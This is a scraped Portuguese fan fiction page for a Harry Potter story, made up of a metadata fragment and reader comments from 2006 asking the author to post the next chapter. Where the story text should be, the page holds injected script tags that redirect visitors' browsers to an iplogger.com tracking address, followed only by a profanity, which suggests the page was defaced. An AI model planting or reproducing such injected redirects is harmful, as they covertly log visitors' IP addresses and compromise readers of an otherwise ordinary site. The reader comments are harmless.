","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • HAIL THE QUEEN SONIA FOR PRESIDENT!!!! OMG!!!! VAI LOGO ATUALIZA O PROX CHAPTER!! EU NECESSITO LER POR FAVOR ATUALIZA ASSIM Q POSSIVEL!!! ESTE ULTIMO TAVA PERFEITO!!!

    2006-06-04
  • oiiii!!!! td bom?? Parabéns pelo maravilhoso capitulo...Fiquei mto decepcionada pelo compotamento do Harry no final....Ainda resta-no alguma esperança?????Espero que sim!!Tenho certeza que o ultimo será o melhor e cheio de surpresas!!!(espero)... bjosss

    2006-06-04
  • o que foi issso????? acho bom ter uma boa explicação para o fim desse capitulo!!!! como assim o harry ficou daquele jeito???? eu esperei tanto pra isso???!!!!! tras ele de volta!!!!!!!!!!!! e bonzinho por que é assim que ele é!!!! não nos decepcione!!!!!!!!! tirando essa parte, meu deus que capítulo!!!!! tudo de bom, emocionante, dava pra imaginar tudo aquilo acopntecendo!!!!!! agora, não demora pra posta o outro capitulo!!!! e com OTIMAS explicações viu??!!!

    2006-06-04
  • Muito bom o final.. e Vc ainda pode terminar o livro, até pq, a última palavra será 'cicatriz...', então... Agora o fato de Harry ter ido embora, tratando os amigos daquela forma, bom, pode ser efeito de tudo... Voldie morreu de morte morrida, mas valia a pena, Harry partir e voltar... e voltar bem, prá ficar tudo bem, enfim...

    2006-06-04
  • olá.... ando acompanhando sua história.... amei... este ultimo cápitulo esta 10000000000000... adorei... e sempre que puder atualiza.... manda ai.. que tem muitos fãs esperando.... Atualiza!!!

    2006-06-04
  • e Harry é salvo pelo amor. Muiiiiiiiiiiiiito perfeito! Mas e agora, será que o monstrinho malvado assumiu controle sobre o Harry? Hm esclarecimento antes do fim do ano, Sônia... aiusiahuishisa.

    2006-06-04
  • Sônia, me diz por favor!!! AINDA RESTA UMA ESPERANÇA??????????????????? O que foi isso?!!! Devo ficar exclamando até o fim do comentário?!!!!!! Estou realmente estufefata, queria surprender, é???? Conseguiu!!!!!! Para começar a minha curta narrativa, voltaremos ao passado (ahahahahah, sou doida mesmo!), afinal somos feito dele, de história... Em um dos meus comentários, eu disse que embora a JK seja a criadora desses personagens fantásticos, você soube sempre, fazer um uso tão correto desse mundo fantátisco de HP, que a sua história, a sua criação passou a ocupar um lugar especial no meu coração. Admiro o seu talento, minha amiga, e como você soube conduzir essa fic brilhantemente e com tanta seriedade. Você chegou lá, venceu cada etapa que se apresentou e chega ao final de sua fic com brilhantismo!!! Ahhh!!! E ainda angariou uma legião de fãs!!! Ai, ai. Você é, como a Morgana costuma dizer, nossa JK brasileira. Bendito o dia, que eu por acaso achei o Potterish, e descobri a Floreios. Agradeço de todo coração por você: me angustiar, me fazer sofrer, me fazer chorar (eu vivi essa história linha por linha e só os bons, realmente bons, conseguem envolver o leitor dessa maneira!!!), me fazer roer as unhas (elas estavam perfeitas para pintá-las do tipo francesinha... agora vai o clarinho básico mesmo nos cotocos que restaram) e para finalizar também quero te agradecer por uma espinha e-nor-me (depois de velha com problemas de adolescência, pode?) que nasceu no meu queixo, só pode ter sido devido ao imenso estresse, só pode!!! Mas, acima de tudo eu quero te agradecer por você partilhar conosco (aquela legião que eu falei, lembra?) seu talento. Você é maravilhosa!!! Beijos no seu generoso coração e tomando emprestado as palavras de Morgana: obrigada por ser minha amiga! Géia. Ps.: Ainda tem a segunda parte e o prólogo... você vai dar um jeito no nosso angustiado heroizinho, não é? Fique bem também e bom final de semana

    2006-06-03
  • Bem eu nao sou de comentar...mas tenho que adimitir estou acompanhando sua fic e meu DEus que fic mais fera...com certeza é a melhor de todas daki... EStou amando... Vc escreve super bem... e me surpreende seu raciocionio... ja é uma das minhas favoritas... Todo dia vejo se nao tem cap novo... mas me diz pensa em fazer até aqul capi? Poxa 34... e quero mais... olha PARABENS e por favor ATUALIZA O MAIS RAPIDO...nao dá pra ficar tanto tempo sem ler... boa até DEMAIS!! bjux

    2006-06-03
  • =PPPPPPPP eu vo salva, pra le mais tarde, agora nao da tempo.... deve estar muito bom o cap 34!!

    2006-06-03
  • meu deus, no que o harry se tormou ? :O

    2006-06-03
Você precisa estar logado para comentar. Faça Login.